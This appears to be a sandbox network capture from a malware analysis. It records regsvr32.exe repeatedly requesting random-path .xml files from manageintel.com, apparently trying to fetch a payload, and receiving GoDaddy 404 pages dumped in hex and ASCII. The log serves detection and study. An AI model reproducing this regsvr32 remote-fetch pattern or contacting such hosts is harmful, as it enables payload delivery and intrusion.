2024-10-29 11:06:58 UTC	1780	IN	HTTP/1.1 404 Not Found Link: <//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.4.43.0.js>; rel=preload; as=script; crossorigin,<https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkids18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDI.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlxdu.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlxdu.woff2>; rel=preload; as=font [TRUNCATED] Cache-Control: max-age=30 Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.com Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding Server: DPS/2.0.0+sha-a9ecb8e X-Version: a9ecb8e X-SiteId: us-east-2 Set-Cookie: dps_site_id=us-east-2; path=/; secure Date: Tue, 29 Oct 2024 11:06:57 GMT Connection: close Transfer-Encoding: chunked
2024-10-29 11:06:58 UTC	14604	IN	Data Raw: 65 36 66 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 74 69 74 6c 65 3e 6d 61 6e 61 67 65 69 6e 74 65 6c 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 6e 61 Data Ascii: e6f1<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="viewport" content="width=device-width, initial-scale=1"/><title>manageintel.com</title><meta name="author" content="Mana

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49804	76.223.105.230	443	5400	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 11:06:58 UTC	131	OUT	GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache Cookie: dps_site_id=us-east-2
2024-10-29 11:06:59 UTC	1780	IN	HTTP/1.1 404 Not Found Link: <//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.4.43.0.js>; rel=preload; as=script; crossorigin,<https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkids18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDI.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlxdu.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlxdu.woff2>; rel=preload; as=font [TRUNCATED] Cache-Control: max-age=30 Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.com Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding Server: DPS/2.0.0+sha-a9ecb8e X-Version: a9ecb8e X-SiteId: us-east-2 Set-Cookie: dps_site_id=us-east-2; path=/; secure Date: Tue, 29 Oct 2024 11:06:58 GMT Connection: close Transfer-Encoding: chunked
2024-10-29 11:06:59 UTC	14604	IN	Data Raw: 65 36 66 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 74 69 74 6c 65 3e 6d 61 6e 61 67 65 69 6e 74 65 6c 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 6e 61 Data Ascii: e6f1<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="viewport" content="width=device-width, initial-scale=1"/><title>manageintel.com</title><meta name="author" content="Mana

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49811	76.223.105.230	443	5400	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 11:06:59 UTC	131	OUT	GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache Cookie: dps_site_id=us-east-2
2024-10-29 11:07:00 UTC	1780	IN	HTTP/1.1 404 Not Found Link: <//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.4.43.0.js>; rel=preload; as=script; crossorigin,<https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkids18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDI.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlxdu.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlxdu.woff2>; rel=preload; as=font [TRUNCATED] Cache-Control: max-age=30 Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.com Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding Server: DPS/2.0.0+sha-a9ecb8e X-Version: a9ecb8e X-SiteId: us-east-2 Set-Cookie: dps_site_id=us-east-2; path=/; secure Date: Tue, 29 Oct 2024 11:06:59 GMT Connection: close Transfer-Encoding: chunked
2024-10-29 11:07:00 UTC	14604	IN	Data Raw: 65 36 66 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 74 69 74 6c 65 3e 6d 61 6e 61 67 65 69 6e 74 65 6c 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 6e 61 Data Ascii: e6f1<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="viewport" content="width=device-width, initial-scale=1"/><title>manageintel.com</title><meta name="author" content="Mana
2024-10-29 11:07:00 UTC	16384	IN	Data Raw: 41 37 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 6f 75 72 63 65 20 53 61 6e 73 20 50 72 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 67 66 6f 6e 74 73 2f 73 2f 73 6f 75 72 63 65 73 61 6e 73 70 72 6f 2f 76 32 32 2f 36 78 4b 77 64 53 42 59 4b 63 53 56 2d 4c 43 6f 65 51 71 66 58 31 52 59 4f 6f 33 71 50 5a 5a 63 6c 53 64 73 31 38 51 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b Data Ascii: A7FF;}/* latin */@font-face { font-family: 'Source Sans Pro'; font-style: italic; font-weight: 700; font-display: swap; src: url(https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2) format('woff2');
2024-10-29 11:07:00 UTC	16384	IN	Data Raw: 68 74 74 70 3a 2f 2f 73 63 72 69 70 74 73 2e 73 69 6c 2e 6f 72 67 2f 4f 46 4c 0a 0a e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 2d 0a 53 49 4c 20 4f 50 45 4e 20 46 4f 4e 54 20 4c 49 43 45 4e 53 45 20 56 65 72 73 69 6f 6e 20 31 2e 31 20 2d 20 32 36 20 46 65 62 72 75 61 72 79 20 32 30 30 37 0a e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 Data Ascii: http://scripts.sil.org/OFL-SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
2024-10-29 11:07:00 UTC	11762	IN	Data Raw: 65 6c 6c 22 20 63 6c 61 73 73 3d 22 78 2d 65 6c 20 78 2d 65 6c 2d 64 69 76 20 63 31 2d 31 20 63 31 2d 32 20 63 31 2d 32 78 20 63 31 2d 33 32 20 63 31 2d 33 33 20 63 31 2d 33 34 20 63 31 2d 31 78 20 63 31 2d 32 7a 20 63 31 2d 31 62 20 63 31 2d 33 30 20 63 31 2d 31 63 20 63 31 2d 31 65 20 63 31 2d 31 64 20 63 31 2d 31 37 20 63 31 2d 31 35 20 63 31 2d 33 39 20 63 31 2d 31 33 20 63 31 2d 31 31 20 63 31 2d 62 20 63 31 2d 63 20 63 31 2d 64 20 63 31 2d 33 36 20 63 31 2d 33 37 20 63 31 2d 65 20 63 31 2d 66 20 63 31 2d 67 22 3e 3c 64 69 76 20 64 61 74 61 2d 75 78 3d 22 42 6c 6f 63 6b 22 20 64 61 74 61 2d 61 69 64 3d 22 48 45 41 44 45 52 5f 4c 4f 47 4f 5f 52 45 4e 44 45 52 45 44 22 20 63 6c 61 73 73 3d 22 78 2d 65 6c 20 78 2d 65 6c 2d 64 69 76 20 63 31 2d 31 69 20 Data Ascii: ell" class="x-el x-el-div c1-1 c1-2 c1-2x c1-32 c1-33 c1-34 c1-1x c1-2z c1-1b c1-30 c1-1c c1-1e c1-1d c1-17 c1-15 c1-39 c1-13 c1-11 c1-b c1-c c1-d c1-36 c1-37 c1-e c1-f c1-g"><div data-ux="Block" data-aid="HEADER_LOGO_RENDERED" class="x-el x-el-div c1-1i

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49818	76.223.105.230	443	5400	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 11:07:01 UTC	131	OUT	GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache Cookie: dps_site_id=us-east-2
2024-10-29 11:07:01 UTC	1780	IN	HTTP/1.1 404 Not Found Link: <//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.4.43.0.js>; rel=preload; as=script; crossorigin,<https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkids18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDI.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlxdu.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlxdu.woff2>; rel=preload; as=font [TRUNCATED] Cache-Control: max-age=30 Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.com Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding Server: DPS/2.0.0+sha-a9ecb8e X-Version: a9ecb8e X-SiteId: us-east-2 Set-Cookie: dps_site_id=us-east-2; path=/; secure Date: Tue, 29 Oct 2024 11:07:01 GMT Connection: close Transfer-Encoding: chunked
2024-10-29 11:07:01 UTC	14604	IN	Data Raw: 65 36 66 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 74 69 74 6c 65 3e 6d 61 6e 61 67 65 69 6e 74 65 6c 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 6e 61 Data Ascii: e6f1<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="viewport" content="width=device-width, initial-scale=1"/><title>manageintel.com</title><meta name="author" content="Mana
2024-10-29 11:07:01 UTC	16384	IN	Data Raw: 41 37 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 6f 75 72 63 65 20 53 61 6e 73 20 50 72 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 67 66 6f 6e 74 73 2f 73 2f 73 6f 75 72 63 65 73 61 6e 73 70 72 6f 2f 76 32 32 2f 36 78 4b 77 64 53 42 59 4b 63 53 56 2d 4c 43 6f 65 51 71 66 58 31 52 59 4f 6f 33 71 50 5a 5a 63 6c 53 64 73 31 38 51 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b Data Ascii: A7FF;}/* latin */@font-face { font-family: 'Source Sans Pro'; font-style: italic; font-weight: 700; font-display: swap; src: url(https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2) format('woff2');
2024-10-29 11:07:01 UTC	16384	IN	Data Raw: 68 74 74 70 3a 2f 2f 73 63 72 69 70 74 73 2e 73 69 6c 2e 6f 72 67 2f 4f 46 4c 0a 0a e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 2d 0a 53 49 4c 20 4f 50 45 4e 20 46 4f 4e 54 20 4c 49 43 45 4e 53 45 20 56 65 72 73 69 6f 6e 20 31 2e 31 20 2d 20 32 36 20 46 65 62 72 75 61 72 79 20 32 30 30 37 0a e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 Data Ascii: http://scripts.sil.org/OFL-SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
2024-10-29 11:07:01 UTC	11762	IN	Data Raw: 65 6c 6c 22 20 63 6c 61 73 73 3d 22 78 2d 65 6c 20 78 2d 65 6c 2d 64 69 76 20 63 31 2d 31 20 63 31 2d 32 20 63 31 2d 32 78 20 63 31 2d 33 32 20 63 31 2d 33 33 20 63 31 2d 33 34 20 63 31 2d 31 78 20 63 31 2d 32 7a 20 63 31 2d 31 62 20 63 31 2d 33 30 20 63 31 2d 31 63 20 63 31 2d 31 65 20 63 31 2d 31 64 20 63 31 2d 31 37 20 63 31 2d 31 35 20 63 31 2d 33 39 20 63 31 2d 31 33 20 63 31 2d 31 31 20 63 31 2d 62 20 63 31 2d 63 20 63 31 2d 64 20 63 31 2d 33 36 20 63 31 2d 33 37 20 63 31 2d 65 20 63 31 2d 66 20 63 31 2d 67 22 3e 3c 64 69 76 20 64 61 74 61 2d 75 78 3d 22 42 6c 6f 63 6b 22 20 64 61 74 61 2d 61 69 64 3d 22 48 45 41 44 45 52 5f 4c 4f 47 4f 5f 52 45 4e 44 45 52 45 44 22 20 63 6c 61 73 73 3d 22 78 2d 65 6c 20 78 2d 65 6c 2d 64 69 76 20 63 31 2d 31 69 20 Data Ascii: ell" class="x-el x-el-div c1-1 c1-2 c1-2x c1-32 c1-33 c1-34 c1-1x c1-2z c1-1b c1-30 c1-1c c1-1e c1-1d c1-17 c1-15 c1-39 c1-13 c1-11 c1-b c1-c c1-d c1-36 c1-37 c1-e c1-f c1-g"><div data-ux="Block" data-aid="HEADER_LOGO_RENDERED" class="x-el x-el-div c1-1i

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49830	76.223.105.230	443	5400	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 11:07:02 UTC	131	OUT	GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache Cookie: dps_site_id=us-east-2
2024-10-29 11:07:02 UTC	1780	IN	HTTP/1.1 404 Not Found Link: <//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.4.43.0.js>; rel=preload; as=script; crossorigin,<https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkids18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDI.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlxdu.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlxdu.woff2>; rel=preload; as=font [TRUNCATED] Cache-Control: max-age=30 Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.com Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding Server: DPS/2.0.0+sha-a9ecb8e X-Version: a9ecb8e X-SiteId: us-east-2 Set-Cookie: dps_site_id=us-east-2; path=/; secure Date: Tue, 29 Oct 2024 11:07:02 GMT Connection: close Transfer-Encoding: chunked
2024-10-29 11:07:02 UTC	14604	IN	Data Raw: 65 36 66 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 74 69 74 6c 65 3e 6d 61 6e 61 67 65 69 6e 74 65 6c 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 6e 61 Data Ascii: e6f1<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="viewport" content="width=device-width, initial-scale=1"/><title>manageintel.com</title><meta name="author" content="Mana
2024-10-29 11:07:02 UTC	16384	IN	Data Raw: 41 37 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 6f 75 72 63 65 20 53 61 6e 73 20 50 72 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 67 66 6f 6e 74 73 2f 73 2f 73 6f 75 72 63 65 73 61 6e 73 70 72 6f 2f 76 32 32 2f 36 78 4b 77 64 53 42 59 4b 63 53 56 2d 4c 43 6f 65 51 71 66 58 31 52 59 4f 6f 33 71 50 5a 5a 63 6c 53 64 73 31 38 51 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b Data Ascii: A7FF;}/* latin */@font-face { font-family: 'Source Sans Pro'; font-style: italic; font-weight: 700; font-display: swap; src: url(https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2) format('woff2');
2024-10-29 11:07:02 UTC	16384	IN	Data Raw: 68 74 74 70 3a 2f 2f 73 63 72 69 70 74 73 2e 73 69 6c 2e 6f 72 67 2f 4f 46 4c 0a 0a e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 2d 0a 53 49 4c 20 4f 50 45 4e 20 46 4f 4e 54 20 4c 49 43 45 4e 53 45 20 56 65 72 73 69 6f 6e 20 31 2e 31 20 2d 20 32 36 20 46 65 62 72 75 61 72 79 20 32 30 30 37 0a e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 94 e2 80 